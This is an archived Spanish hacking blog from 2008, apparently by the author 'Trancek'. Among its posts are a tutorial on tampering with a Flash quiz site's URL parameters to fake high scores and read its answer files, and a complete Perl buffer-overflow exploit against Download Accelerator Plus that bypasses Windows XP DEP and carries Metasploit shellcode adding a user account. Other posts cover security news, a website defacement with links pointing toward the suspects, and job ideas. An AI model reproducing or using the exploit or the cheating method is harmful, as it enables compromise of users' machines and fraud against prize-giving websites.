jueves, 1 de mayo de 2008

Viejo artículo sobre cutre ataques en flash

Bueno aquí os dejo un viejo artículo que hice para la ezine de un amigo, la de cicklow pero que por diversas razones al final no se publicó la ezine, como ya esta paginani existe y queda obsoleta, pues lo publico, decir que actualemtne hay páginas del mismo estilo y con mejore premios que son vulnerables, y que aunque una fue avisada hace más de un año, no la ha arreglado, tendrían que cambiar la web entera xDD, les iba a costar más dinero arreglarla que lo que la gente pueda llevarse en premios.

Edito: La página esta On de nuevo después de tanto tiempo, no se si lo habrán arreglado, lo miraré cuando no me de pereza registrarme jeje, si alguno lo mira y ve que siguen los fallos que avise al admin jeje :P, no seais malos.

--------------------------------------------------------------------------------------------------

Cómo saltarse las aplicaciones Flash para ganar en páginas web

Introducción
Hace tiempo ya, un amigo me comentó una página web en la cual se podía hacer trampas y sin comentarme nada más, me puse a investigar a ver que podía ser.

La página web en cuestión es:
http://www.futbolreto.com/ -- Actualmente, Fuera de línea.

Me registré en ella con el nombre de Antonio13 para hacer pruebas, me autentifiqué y me lleva a esta web.
http://www.futbolreto.com/login/index.php?open=aktiv


A la carga
Le damos a jugar y nos lleva a la siguiente:
http://www.futbolreto.com/login/index.php?open=secure
Le damos a ver código fuente y nos fijamos en esta parte:

[Código]
[object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="600" height="400"]
[param name="movie" value="preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11" /]
[param name="quality" value="" /]
[embed src="preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="600" height="400"][/embed]
[/object]
[/Código]

Esta línea es interesante: preguntas_v5.swf?sasa=Antonio13&datum=2006-08-11, nos muestra como se llama el archivo Flash: preguntas_v5.swf, el nombre: sasa=Antonio13 y la fecha: datum=2006-08-11.

Bueno metemos en http://www.futbolreto.com/login/preguntas_v5.swf y observamos que es el flash de antes.
Nos lo bajamos por ejemplo con el flash get u otro acelerador de descargas y lo guardamos. Luego para ver el código de los archivos .swf nos bajamos por ejemplo el flash decompiler 2.90 que es el que tengo yo y lo abrimos con ese programa.
Si nos fijamos a la derecha vemos varias cosas como shape,image,morph,sound,video, etc. A nosotros nos interesa la parte de sprite en la cual hay 84, podemos ir mirando y tenemos que tener en cuenta las variables que tenía la url del código anterior, sasa y datum. Buscamos esas variables y nos paramos en el de sprite 219 ("mama") y nos fijamos en el archivo.
----------
usuario = -root.sasa;
puntos = _root.puntos;
fecha = _root.datum;
Y más abajo:
trace("sasa" + _root.sasa);
trace("puntos" + _root.puntos);
trace("fecha" + _root.datum);
getUrl("guardar.php", "dave", "POST");
----------

Esas son las variables que tiene en el juego para ir apuntando el usuario, fecha y puntos y la última para guardar todos los datos anteriores, así que ya tenemos todo hecho solo falta hacer una cosa.

Siendo un crack en el futbol
Si probamos con la siguiente dirección estas variables y las modificamos a nuestro gusto:
http://www.futbolreto.com/login/preguntas_v5.swf?sasa=Antonio13&puntos=28000&datum=2006-08-11
Al ir a esa dirección nos sale para jugar, cogemos cualquier categoría y le damos a responder sin marcar nada y dirá que perdimos, pero como somos unos expertos en el fútbol, como se aprecia en nuestros puntos "acumulados", vamos al ranking y aparece Antonio13 en primer lugar con 28000 puntos, así que podéis modificar eso como más os guste.
Ranking - http://www.futbolreto.com/login/index.php?open=rank
También os podéis ingeniar un programa que haga registros automáticos ya que sabéis como funciona y donde lo guarda, así que eso os lo dejo a vosotros por si queréis probar.

Viendo las respuestas a las preguntas:
Bueno, vamos a ver otras cosas interesantes a la vista. En el mismo sprite 219 ("mama"),nos fijamos en estas líneas:

[Código]
das = random(_root.npreg) + 1;
Obj1 = new LoadVars();
Obj1.load("./" +_root.ram + "/" + das + ".txt", 0);
Obj1.onload = function ()
{

titulo = Obj1.pregunta;
rta1 = Obj1.rta1;
rta2 = Obj1.rta2;
rta3 = Obj1.rta3;
rta4 = Obj1.rta4;
soplo = Obj1.soplo;
verdad = Obj1.verd;

[/Código]

Ahora nos fijamos aquí: Obj1.load("./" +_root.ram + "/" + das + ".txt", 0); -- esto quiere decir que en donde actualmente está el .swf, www.futbolreto.com/login , hay una / y carga las categorías que son 5 (_root.ram) y luego otra / y carga el número de preguntas y lo pone como .txt por lo que quedaría así “www.futbolreto.com/login/1/1.txt” y como tiene 5 categorías hasta aquí www.futbolreto.com/login/5/1.txt y lo que es el 1.txt(das) varia hasta muchos números, así que vamos probando y guardamos las respuestas.
Y aquí termina este documento, podréis hacer vosotros vuestras pruebas y si queréis ganar, sin que se note mucho, aunque ya no hay premios porque hace tiempo que mi amigo informó y los quitaron y el fallo siguen sin arreglarlo.
Actualmente hay más páginas con este tipo de vulnerabilidades que muestran información sensible y que hace posible el poder saltarse las reglas.

Hecho por: Trancek, trancek@p1mp4m.es

martes, 29 de abril de 2008

Menudo mes viene - Mayo

Últimamente tengo poco tiempo para postear por aquí, por P1MP4M.es, yashira.org y en la lista tan buena de cracklatinos, y todo debido al instituto principalmente, aunque también a otros asuntos, así que durante el mes de Mayo, mes de exámenes, estaré desaparecido por estos lugares.

A ver si para el 21 de Mayo me va todo bien, y me tomo las vacaciones más largas de la vida jeje, y a aprovechar a buscar vulnerabilidades pero sobretodo a aprender Ing Inversa, o quien sabe tal vez me ponga algo con las inyecciones que soy bastante paquete.

Ale el que quiera algo que me diga por msn si me pilla o que me mande un mail, taluegooooo

domingo, 20 de abril de 2008

El final de hakin9 en español

Me acabo de acordar de una noticia la cual creo que no está en ningún sitio o al menos yo no lo vi y es que resulta que hakin9 en español desaparece después de años ofreciendo buena información tanto teórica como práctica. No se si la empresa se habrá pronunciado pero al tratar de hablar con ellos para ponerme a escribir un artículo, me contestaron y la contestación fue clara y precisa, la edición española de hakin9 ya no va a salir, así que toca recopilar todas las revistas hasta el momento.

Por lo que una de las últimas entregas es la de Enero creo, del 2008, en la que el señor xD Chema habla de sql injection con consultas pesadas, y además tambien una recopilación de artículos para principantes.

Primero desaparece HackXCrack y ahora Hakin9, con que revistas de hacking en español nos vamos a quedar?? :(

jueves, 3 de abril de 2008

Lugares donde trabajar

Después de estar participando en sitios haciendo retos, o intentándolos, moviéndome un poco en este mundillo he estado mirando varios sitios donde molaría trabajar. Como "ingeniero inverso" principalmente, auditorías, etc. Aunque en temas de vulnerabilidades está más centrado fuera de España, como Core, TippingPoint, etc, por aquí en algún trabajo creo que también hay, aunque ni idea porque nunca fui currante. A ver si alguno que sepa se pasa por aquí y me dice o me deja un comentario sobre el trabajo que tienen que hacer en distintos puestos :P.

En Madrid hay un número de empresas que se dedican a ello, aunque fuera también(Que sepan que no es publicidad ya que no trabajé en ninguna pero por su gente me parece que tiene nivel o que está interesante).

-Informatica 64 - Con su querido Chema Alonso y Microsoft xDD, Pedro Laguna...
-S21sec - Buena gente ha trabajado ahí, y actualmente mikel gastesi.
-SIA - Andrés Tarasco y Alejandro Ramos, etc.
-Ecija

Málaga:

-HispaSec

Barcelona:

-ISecAuditors

Otros:
La gente de 48bits creo que trabaja de forma independiente pero se ve que son bastante buenos también.

A ver si a partir de verano aprendo más de ingenieria inversa y consigo algo jeje, que va siendo hora y sino a seguir buscando vulns xD.

Saludos a todos

Editado.

miércoles, 19 de marzo de 2008

Download Accelerator Plus(DAP), + DEP (Data Execution Prevention)

Ahi os dejo el exploit para que veais como poder desactivar esa proteccion tan maja que trae el windows xp sp2(activada por defecto para pocos procesos como explorer y desactivada para todo lo demas) y el windows 2003(activada para todo por defecto).

Link de descarga del tutorial

PD:Decir que funciona aunque DEP este desactivado tambien

#!/usr/bin/perl
################################################################################
#####################################
#
#
#Exploit por: Trancek
#Email:trancek@yashira.org
#
################################################################################
######################################
use Cwd;

print "Download Accelerator Plus (DAP) 0.86 .m3u Exploit\n\n";


$localhost = "http://localhost/";
$junk = "\x90" x 14115; #Hasta el Ret
$moval1 = "\x80\x20\x96\x7C"; #mov al,1 --> ntdll.dll(xp sp2 spanish)
$padding1 = "\x90" x 4; #NOP
$especialret = "\x94\x11\x91\x7C"; #mov ebp,esp(+codigo hasta ret) --> ntdll.dll(xp sp2 spanish)
$padding2 = "\x90" x 8; #NOP
$ret = "\xED\x1E\x95\x7C"; #jmp esp,win xp sp2(spanish)
$cpmal1 = "\xF8\xD3\x92\x7C"; #cmp al,1 --> ntdll.dll(xp sp2 spanish)
$nopeando = "\x90" x 20; #NOP


# win32_adduser - PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x33\x4b\x58\x4e\x57".
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x54".
"\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43".
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x45\x4a\x36\x42\x4f\x4c\x58\x46\x30\x4f\x45\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x4d\x46".
"\x46\x46\x50\x42\x45\x56\x4a\x47\x45\x46\x42\x52\x4f\x52\x43\x36".
"\x42\x32\x50\x46\x45\x46\x46\x57\x42\x52\x45\x47\x43\x37\x45\x36".
"\x44\x37\x42\x32\x46\x37\x45\x36\x43\x47\x46\x37\x42\x42\x46\x37".
"\x45\x36\x43\x37\x46\x37\x42\x52\x4f\x52\x41\x44\x46\x54\x46\x44".
"\x42\x52\x48\x42\x48\x32\x42\x32\x50\x36\x45\x56\x46\x57\x42\x42".
"\x4e\x36\x4f\x36\x43\x56\x41\x36\x4e\x56\x47\x46\x44\x37\x4f\x36".
"\x45\x37\x42\x37\x42\x42\x41\x34\x46\x46\x4d\x56\x49\x56\x50\x46".
"\x49\x56\x43\x57\x46\x37\x44\x37\x41\x56\x46\x47\x4f\x56\x44\x37".
"\x43\x57\x42\x52\x46\x47\x45\x56\x43\x37\x46\x47\x42\x32\x4f\x52".
"\x41\x34\x46\x34\x46\x34\x42\x30\x5a";


open(m3u, ">./vulnerable.m3u");
print m3u "$localhost";
print m3u "$junk";
print m3u "$moval1";
print m3u "$padding1";
print m3u "$especialret";
print m3u "$padding2";
print m3u "$ret";
print m3u "$cpmal1";
print m3u "$nopeando";
print m3u "$shellcode";

print "Instrucciones: El usuario tiene que pulsar el boton verificar. \n";
print "Con este exploit puede saltarse el DEP de Windows XP SP2\n\n";
print "Archivo creado\n";

domingo, 2 de marzo de 2008

Deface a Izquierda Unida

Hoy al medio dia mientra veo Antena 3, hay una noticia que me llama la atención, izquierda unida ha sido "hackeada" por "hackers", definicion no bien dada ya que si no me confundo no superan seguramente los 20 años ni los conocimientos de los grandes, son más bien los defacers y que les ha pasado lo peor que les puede pasar, que se haga público y llamativa la noticia y por lo tanto, que tomen medidas en el asunto, como bien leo en elpais:
--------------------------------------
Según miembros del equipo técnico de IU, los 'hackers' han conseguido saltarse las medidas de seguridad y se han apoderado de la máquina que da alojamiento a la página, a la vez custodiada por una empresa puntera en Europa en suministrar servicios de Internet. "No son unos aficionados. Se han saltado todos nuestros filtros y controlan la máquina desde sus propios ordenadores. Nuestros técnicos están trabajando para solucionar el problema, pero es muy serio", dijo Francisco José Mendi.

Izquierda Unida presentará una denuncia ante la Policía encargada de los 'cyberdelitos'. Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".

--------------------------------------

Al leer lo primero y conocer el antiguo grupo de DOM Team un poco pensé...son buenos pero tanto como para saltarse todos sus filtros?? Yo creo que habrá sido un poco de inyección SQL o vete tu a saber, algun password por defecto o cualquier otro bug a nivel web, pero muchos filtros no tendrían..pero bueno y lo 2º, es lo que viene a veces, esta vez creo que si le quieren pillar le pillan, porque hay alguno español me parece y además dejan sus datos a la vista de todos. Pero bueno deberian protegerse más y dejarse de gastar el dinero y tiempo en buscar a la gente que lo hace, que en protegerse para que no pase nada.

Ahi dejo cosas para que vean lo facil que es ver algo por internet, y que si quieren no creo que tarden mucho ya que en algun lado de internet han dejado su ip verdadera o tal vez hasta nombre real. Solo es cuestion de tiempo y dinero.

Datos:
http://whois.domaintools.com/domlabs.org
http://www.spanish-hackers.com/users/ka0x.txt

Blog:
http://buclenoapto.wordpress.com/
http://xarnuz.wordpress.com/

Sobre DOM Team:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,D.O.M/


PD: Respecto a este comentario:
-----
Para el responsable de comunicación de IU no hay ninguna duda de que se trata de "un ataque político", que podría ser obra de "algún grupo de ultraderecha camuflado de anarquistas".
-----

Yo creo que lo dice para que se haga notar IU nada más, lo hacen con cualquier partido y cualquier página, no creo que hayan elegido IU por ser IU, cuanta consipiracion...un grupo de ultraderechas camuflado de anarquistas...revisen los ataques diarios y veran como eso no importa xDD.


Noticia:
http://www.elmundo.es/elmundo/2008/03/02/eleccionesgenerales/1204457114.html

martes, 12 de febrero de 2008

A la carga con los exploits

El taller ya lo abrí para irse iniciando, decir que aunque está un poco chapuza, espero que no tengan problemas y aprendan mucho, todos los post del foro se irán actualizando a medida que haya más información, corrección de fallos, links que falta poner, software que analizar, etc.

Así que espero que se animen y aprendan que es un tema bastante bonito jejej

Os espero a todos los que se animen y quieran compartir y aprender

Saludos y suerte


Link:http://www.p1mp4m.es/index.php?showforum=28